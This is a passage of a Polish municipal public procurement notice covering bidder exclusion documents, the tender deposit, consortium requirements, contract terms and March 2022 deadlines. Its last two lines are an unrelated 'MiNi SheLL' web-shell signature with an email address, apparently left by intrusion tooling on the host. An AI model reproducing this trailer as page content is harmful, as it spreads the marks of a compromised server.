potwierdzenie niepodlegania wykluczeniu: <span class="normal">2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w<br/>okolicznościach, o których mowa art. 108 ust. 1 i 2 u.p.z.p. oraz art. 109 ust. 1 pkt 4 i 7-10 u.p.z.p.,<br/>Zamawiający żąda przedłożenia następujących dokumentów:<br/>1) W celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 u.p.z.p<br/>zamawiający żąda odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji - Zamawiający zgodnie z zapisami art. 274 ust. 1 u.p.z.p. wezwie Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia niniejszego dokumentu w wyznaczonym, nie krótszym niż 5 dni<br/>terminie.<br/>3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentów, o których mowa wyżej w Rozdziale 10 pkt 2 zamiast dokumentu określonego w<br/>pkt 2 ppkt. 1) – Wykonawca składa dokument lub dokumenty wystawione w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego<br/>likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury.<br/>4. Dokumenty, o których mowa w powyżej pkt 3, powinny być wystawione nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.<br/>5. Zamawiający żąda od Wykonawcy, który:<br/>a) polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 u.p.z.p.,<br/>przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w Rozdziale 10 -<br/>Zamawiający zgodnie z zapisami art. 274 ust. 1 u.p.z.p. wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia dokumentów wymienionych w niniejszym pkt 5 lit a w wyznaczonym,<br/>nie krótszym niż 5 dni terminie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">12. Wykaz oświadczeń lub dokumentów składanych przez wykonawcę w<br/>postępowaniu w celu wykazania spełnienia warunków udziału w postępowaniu:<br/>1) załącznik nr 2 Oświadczenie Wykonawcy o niepodleganiu wykluczeniu i spełnianiu warunków<br/>udziału w postępowaniu – składany wraz z ofertą,<br/>2) załącznik nr 3 Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z<br/>oświadczeniem o posiadaniu wykształcenia i kwalifikacji zawodowych – składany na wezwanie zgodnie<br/>z art. 274 ust. 1 u.p.z.p.,<br/>3) załącznik nr 4 Wykaz wykonanych robót wraz z dokumentami potwierdzającymi ich należyte<br/>wykonanie – składany na wezwanie zgodnie z art. 274 ust. 1 u.p.z.p.,<br/>4) załącznik nr 5 Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia (w przypadku określonym w art. 118 ust. 1 u.p.z.p.) –<br/>składany wraz z ofertą.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Rozdział 26 pkt 8 SWZ:<br/>Zamawiający wymaga, by Wykonawca przedstawił wraz z ofertą przedmiotowe środki<br/>dowodowe, tj. prawidłowo wypełnione i podpisane Wykaz cen oraz Wykaz stawek i narzutów<br/>zgodnie z załączonymi do SWZ wzorami stanowiącymi załączniki nr 1a i 1b do SWZ (oba<br/>załączniki znajdują się w pliku Excel pn. Wykaz cen i Wykaz stawek i narzutów). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium. Wykonawca zobowiązany będzie do wniesienia<br/>wadium przed upływem terminu składania ofert w wysokości: 11 000,00 zł.<br/>2. Wadium może być wnoszone w jednej lub kilku formach:<br/>2.1. pieniądzu;<br/>2.2. gwarancjach bankowych;<br/>2.3. gwarancjach ubezpieczeniowych;<br/>2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz. U. z 2020 r.poz. 299).<br/>Szczegółowe informacje dotyczące wadium zostały zawarte w Rozdziale 13. SWZ dostępnej na<br/>www.umopole.logintrade.net <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w pkt. 1, Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. Zamawiający nie wymaga od Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiadania określonej formy prawnej w celu złożenia oferty lub wniosku o<br/>dopuszczenie do udziału w postępowaniu.<br/>4. Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia<br/>5. W przypadku Konsorcjum do oferty musi być załączony dokument ustanawiający<br/>pełnomocnika Konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>6. Nie dopuszcza się składania umowy przedwstępnej Konsorcjum lub umowy zawartej pod<br/>warunkiem zawieszającym.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać<br/>warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych<br/>warunków zgodnie z zapisami zawartymi w Rozdziałach 9 i 10 SWZ.<br/>8. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>9. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców, oświadczenie oraz dokumenty składane na potwierdzenie spełnienia warunków<br/>mogą być złożone przez każdego z Wykonawców składających ofertę wspólną, jeżeli każdy z<br/>nich spełnia wszystkie warunki samodzielnie, albo może być złożone wspólnie przez wszystkich<br/>Wykonawców, to znaczy, że na oświadczeniu należy wypisać wszystkich Wykonawców i<br/>podpisują je wszyscy upełnomocnieni przedstawiciele Wykonawców lub podpisuje je<br/>upełnomocniony przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>pełnomocnik.<br/>10. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia, których oferta<br/>zostanie uznana za najkorzystniejszą, są zobowiązani przed podpisaniem umowy o realizację<br/>zamówienia przedstawić Zamawiającemu stosowną umowę, regulującą warunki współpracy<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, zawierającą w swojej treści<br/>minimum następujące postanowienia:<br/>a) wyszczególnienie Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego,<br/>b) określenie celu gospodarczego, dla którego umowa została zawarta (celem tym musi być<br/>zrealizowanie zamówienia),<br/>c) oznaczenie czasu trwania Konsorcjum obejmującego okres realizacji przedmiotu zamówienia,<br/>d) podział zadań pomiędzy poszczególnych Wykonawców należących do Konsorcjum,<br/>e) określenie lidera Konsorcjum (powinien nim być Pełnomocnik wskazany w ofercie<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia),<br/>f) wykluczenie możliwości wypowiedzenia umowy Konsorcjum przez któregokolwiek z jego<br/>członków do czasu wykonania zamówienia, odpowiedzialność za realizację zamówienia, za<br/>niewykonanie lub nienależyte wykonanie zamówienia oraz za wniesienie zabezpieczenia<br/>należytego wykonania umowy,<br/>g) zapis mówiący, że Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za<br/>realizację zamówienia, za niewykonanie lub nienależyte wykonanie zamówienia oraz za<br/>wniesienie zabezpieczenia należytego wykonania umowy,<br/>h) zapisy wykluczające możliwość przenoszenia praw i obowiązków stron umowy bez zgody<br/>pozostałych uczestników<br/>i) ustanowienie pełnomocnika do zawarcia umowy w sprawie zamówienia publicznego. Przez<br/>wszystkie podmioty wchodzące w skład konsorcjum<br/>j) Umowa konsorcjum musi być podpisana i oznaczona w taki sposób, by prawnie<br/>zobowiązywała wszystkie podmioty wchodzące w skład konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały zawarte w Części nr II SWZ - Wzór Umowy dostępnej na www.umopole.logintrade.net <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-11 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w postaci elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym zgodnie z instrukcją pn. „Udział w trybie podstawowym bez negocjacji” zmieszczoną na Platformie zakupowej w zakładce INSTRUKCJE https://umopole.logintrade.net/rejestracja/instrukcje.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-11 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-09</span></h3> <h3 class="mb-0">8.19.) Umowa ramowa: </h3> Umowa ramowa zawarta zostanie z jednym wykonawcą <h3 class="mb-0">8.20.) Przewiduje się ograniczenie liczby uczestników umowy ramowej: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.21.) Maksymalna liczba wykonawców, z którymi zamawiający zawrze umowę ramową: <span class="normal">1</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com